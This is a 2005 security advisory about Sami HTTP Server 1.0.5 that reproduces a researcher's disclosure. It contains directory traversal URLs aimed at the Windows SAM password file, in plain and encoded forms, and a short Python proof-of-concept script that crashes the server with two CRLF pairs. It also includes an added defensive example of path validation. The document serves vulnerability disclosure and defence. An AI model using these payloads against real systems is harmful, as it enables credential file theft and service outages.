SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Sami HTTP Server
Vendors:   KarjaSoft
Sami HTTP Server Input Validation Holes Disclose Files to Remote Users and Let Remote Users Crash the Service
SecurityTracker Alert ID:  1013191
SecurityTracker URL:  http://securitytracker.com/id/1013191
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 15 2005
Impact:   Denial of service via network, Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0.5
Description:   Ziv Kamir of Global Security Solution IT reported a vulnerability in Sami HTTP Server. A remote user can view files on the target system or cause the web service to crash.

A remote user can send a specially crafted HTTP request containing '../' directory traversal characters to obtain files on the system that are located outside of the web document directory. Encoded directory traversal characters can also be used.

Some demonstration exploit URLs are provided:

http://[target]/../../winnt/repair/sam

http://[target]/%2e%2e/%2e%2e/winnt/repair/sam

A remote user can also send an HTTP request with two consecutive Carriage Return (CR) and Line Feed (LF) pairs ('\x0d\x0a') to cause the web service to crash.

The vendor was notified on February 6, 2005 without response.
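
The two checks whose absence the description above implies, shown as an added defensive example (not KarjaSoft's code and not part of the original report): decode the request target once, canonicalize it, and confirm it stays under the document root, and answer an empty request line with a 400 instead of failing. DOC_ROOT and all function names are assumptions made for this example.

```python
import os
from urllib.parse import unquote

DOC_ROOT = "/srv/www"  # assumed document root, chosen for this example


def parse_request_line(raw: bytes):
    """Return (method, target), or None for an empty or malformed request line."""
    line = raw.split(b"\r\n", 1)[0].decode("latin-1")
    parts = line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None  # a bare CRLF CRLF lands here: reject it, never index into it
    return parts[0], parts[1]


def resolve_target(target: str, doc_root: str = DOC_ROOT):
    """Map a request target to a path under doc_root, or None if it escapes."""
    path = unquote(target.split("?", 1)[0])  # decode %2e%2e BEFORE any check
    path = path.replace("\\", "/")           # Windows accepts both separators
    if "\x00" in path or not path.startswith("/"):
        return None                          # NUL byte or non origin-form target
    root = os.path.realpath(doc_root)
    candidate = os.path.realpath(os.path.join(root, path.lstrip("/")))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:                       # e.g. a different drive on Windows
        inside = False
    return candidate if inside else None


def handle(raw: bytes, doc_root: str = DOC_ROOT) -> int:
    """Return the HTTP status a hardened server would choose for this request."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return 400
    if resolve_target(parsed[1], doc_root) is None:
        return 403
    return 200


if __name__ == "__main__":
    # Constructed sample requests mirroring the cases in the advisory.
    for req in (b"\r\n\r\n",
                b"GET /../../winnt/repair/sam HTTP/1.0\r\n\r\n",
                b"GET /%2e%2e/%2e%2e/winnt/repair/sam HTTP/1.0\r\n\r\n",
                b"GET /index.html HTTP/1.0\r\n\r\n"):
        print(req, "->", handle(req))
```

The containment test is done on the canonical path after decoding, so the plain and percent-encoded forms are rejected by the same comparison rather than by pattern matching on '../'.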

Impact:   A remote user can view files on the target system that are located outside of the web document directory.

A remote user can cause the target web service to crash.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.karja.com/samihttp/
Cause:   Exception handling error, Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Sami HTTP Web Server Ver 1.0.5


15/02/05


====================================
 GSSIT - Global Security Solution IT
====================================		

-------------------------------------------------------

Application: Sami HTTP Server 
Web Site:    www.karja.com
Versions:    1.0.5
Platform:    Windows 

             
                           
Credits:
########

#########################################
#         ==  Ziv Kamir ==              #
#                                       #
# GSSIT - Global Security Solution IT   #                   
#                                       #
#     WEB : www.gssit.co.il             #
#                                       #
#                                       #
#########################################

---------------------

1) Introduction
2) Bugs
3) The Code
4) Fix


================
1) Introduction
================

Easy to set up webserver, for when you value simplicity and ease of use. 

Some of the features are: 

Simple setup, and runs on Windows 95/98/Me/NT/2000/XP 
Full access to all the server's features from the main control in the system tray 
Configuration with a few simple clicks; no need to edit configuration files or run a lengthy setup 
Enable PHP support on Sami HTTP Server with a few clicks. 

=======
2) Bugs
=======
 
1) A remote user can obtain files on the system that are located outside of the web document directory. 

2) The web server can be crashed by sending two Carriage Return (CR) and Line Feed (LF) [ \x0d\x0a ]. 

===========
3) The Code
===========

1)

http://[Target]/../../winnt/repair/sam

http://[Target]/%2e%2e/%2e%2e/winnt/repair/sam


2)

#######################################################################################################

##############################################################
#        GSS-IT Research And Security Labs                   #
##############################################################
#                                                            #
#                www.gssit.co.il                             #
#                                                            #
##############################################################
#  Sami HTTP Web Server Ver 1.0.5  Denial Of Service PoC     #
##############################################################
#        Use This PoC For Educational Purposes Only          #
##############################################################

import sys
import socket


print("##########################################################\n")
print("#  Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC  #\n")
print("##########################################################\n\n")

if (len(sys.argv) < 3 ) :
 print "Usage: %s <Target> <Port>" %sys.argv[0]
 sys.exit(0)

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = sys.argv[1]
port   = int(sys.argv[2])

try:
 server.connect((target,port))
 print "Sending CRLF ...\n\n"
 server.send("\x0d\x0a\x0d\x0a")
 server.close()
 print "Done ... Check your web server"
except:
 print "Cannot connect to http server on %s" %target


#######################################################################################################

======
4) Fix
======

Date of Vendor Notification:
----------------------------

06/02/05

Response:
=========

No Response.

==============================================================================================

                 *** The Data is for educational purpose only. *** 

          The information in this bulletin is provided "AS IS" without 
          warranty of any kind. In no event shall we be liable for any 
          damages whatsoever including direct, indirect, incidental, 
          consequential, loss of business profits or special damages. 

==============================================================================================

Copyright 2019, SecurityGlobal.net LLC